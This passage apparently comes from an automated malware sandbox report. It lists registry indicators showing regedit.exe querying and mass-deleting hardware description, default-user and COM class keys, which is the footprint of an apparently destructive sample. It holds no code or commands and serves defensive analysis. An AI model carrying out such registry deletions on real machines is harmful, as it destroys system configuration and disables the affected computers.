| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Windows\regedit.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Microsoft.Windows.LanguageComponentsInstaller | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Control Panel\Input Method\Hot Keys\00000203 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace492361004\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\SortOrder\AssemblyItem | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.HTM | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace475a1c57b\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe%5Cresources.pri | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{D80D1001-5B38-49E9-9D34-EC9B84779189} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Microsoft.Windows.ParentalControls | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace461026441\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe%5Cresources.pri | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace4bb18b302\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d5acdded540f4d\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\HiddenDummyLayouts | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace4cb13e166\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri\1d5acddd82645c0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Windows.SystemToast.SoftLanding | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Control Panel | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe%5Cresources.pri | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Windows.SystemToast.BackgroundAccess | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace495c536df\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Windows.SystemToast.Calling.SystemAlertNotification | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Control Panel\Cursors | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-1181767204-2009306918-3718769404-1000\02egqfmeggaduhzt | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\Colors | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace48ea9bf97 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.BioEnrollment_cw5n1h2txyewy%5Cresources.pri\1d7e53689ea9e9c | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\System\GameConfigStore\Parents | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.XGpuEjectDialog_cw5n1h2txyewy%5Cresources.pri\1d7e536746cabe0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Cryptography | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SharingMFU | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d5acddee1afafc\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy%5Cresources.pri\1d7e53694d87964 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Windows.System.MiracastReceiver | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Windows.SystemToast.NfpDevicePairing | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Control Panel\Accessibility\HighContrast | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe%5Cresources.pri\1d5acddd8370c4b\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\System\GameConfigStore\Children | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace48a557267 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\Assemblies | C:\Windows\regedit.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.BioEnrollment_10.0.19041.1023_neutral__cw5n1h2txyewy | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0175-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Component Categories\{62C8FE65-4EBB-45E7-B440-6E39B2CDBF29} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000209A2-0000-0000-C000-000000000046}\ProxyStubClsid32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Extensions\windows.fileTypeAssociation\.msixbundle | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4B2E957D-0393-11D1-B1AB-00AA00BA3258}\1.0\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Word.TemplateMacroEnabled.12\Protocol\StdFileEditing\SetDataFormats | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{75D01070-1234-44E9-82F6-DB5B39A47C13} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\7-Zip.gz\shell\open | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0034-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0380-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00020865-0000-0000-C000-000000000046}\TypeLib | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000C1718-0000-0000-C000-000000000046} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9B496CE1-811B-11CF-8C77-00AA006B6814}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0094-ABCDEFFEDCBB} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0234-ABCDEFFEDCBA} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{30510763-98B5-11CF-BB82-00AA00BDCE0B}\TypeLib | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.vstx\ShellEx\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Extensions\windows.protocol\xboxmusic\AppXxd1ehghzsv8twt9b8b18jrd6q54mjz0n | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0390-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5852F5ED-8BF4-11D4-A245-0080C6F74284}\MiscStatus\1 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0041-ABCDEFFEDCBA} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBC} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0134-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00020907-0000-0000-C000-000000000046}\NotInsertable | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\dotnet_runtime_56.64.8781_x64 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{768B08BE-40A0-44BE-A52C-65211D3F93A8} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CDE8FCF3-0951-5124-94E5-9B7939B22F58} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{EE9CFA8C-F997-4221-BE2F-85A5F603218F}\1.0\FLAGS | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000208AE-0000-0000-C000-000000000046} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00024402-0000-0000-C000-000000000046} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\MMS\shell\open\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{E1750462-1E90-3099-A505-D9AEBAB4E933}\15.0.0.0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0373-ABCDEFFEDCBA} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F77A0168-0396-5111-A487-A795F24646B7} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0161-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2503B6EE-0889-44DF-B920-6D6F9659DEA3}\TypeLib | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\System.Runtime.InteropServices.OutAttribute | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6306E526-9E02-4696-BFF9-48338A27F8AF}\ProxyStubClsid32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9B4CD3F1-4981-101B-9CA8-9240CE2738AE} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0002-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
